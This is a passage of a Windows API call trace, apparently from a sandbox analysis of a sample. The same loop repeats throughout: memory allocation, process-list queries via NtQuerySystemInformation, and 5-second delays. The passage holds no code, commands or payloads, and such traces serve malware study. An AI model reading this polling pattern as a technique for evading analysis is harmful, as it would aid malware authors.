BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0253.608] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0253.608] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0253.613] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0253.614] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0253.615] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0253.615] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0253.616] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0253.617] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0253.617] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0253.622] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0253.623] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0253.625] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0253.626] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0253.627] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0253.628] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0253.628] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0253.634] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0253.635] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0253.646] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0253.647] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0253.647] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0253.648] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0253.648] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0253.662] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0253.663] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0253.665] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0253.665] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0253.667] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0253.667] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0253.668] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0253.672] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0253.672] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0253.674] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0253.674] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0253.675] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0253.675] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0253.675] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0253.680] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0253.681] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0253.682] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0253.683] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0253.684] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0253.684] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0253.684] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0253.687] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0253.688] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0253.690] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0253.690] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0253.691] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0253.691] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0253.692] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0253.695] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0253.696] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0253.698] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0253.701] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0253.702] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0253.702] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0253.703] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0253.708] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0253.709] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0253.711] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0253.712] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0253.713] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0253.714] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0253.714] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0253.721] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0253.722] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0253.723] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0253.724] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0253.725] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0253.725] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0253.725] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0253.731] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0253.732] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0253.734] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0253.734] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0253.735] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0253.735] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0253.736] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0253.741] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0253.742] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0253.745] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0253.746] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0253.747] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0253.748] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0253.748] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0253.753] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0253.754] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0253.756] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0253.756] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0253.758] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0253.758] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0253.758] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0253.763] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0253.764] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0253.766] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0253.766] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0253.767] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0253.768] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0253.768] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0253.772] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0253.773] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0253.775] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0253.776] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0253.777] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0253.778] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0253.778] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0253.782] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0253.783] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0253.785] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0253.785] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0253.786] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0253.787] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0253.787] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0253.792] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0253.793] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0253.795] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0253.795] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0253.796] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0253.797] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0253.797] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0253.803] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0253.804] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0253.806] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0253.807] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0253.808] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0253.808] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0253.808] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0253.813] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0253.814] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0253.816] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0253.816] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0253.817] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0253.817] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0253.818] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0253.822] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0253.823] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0253.824] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0253.825] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0253.826] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0253.826] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0253.827] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0253.831] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0253.832] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0253.834] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, 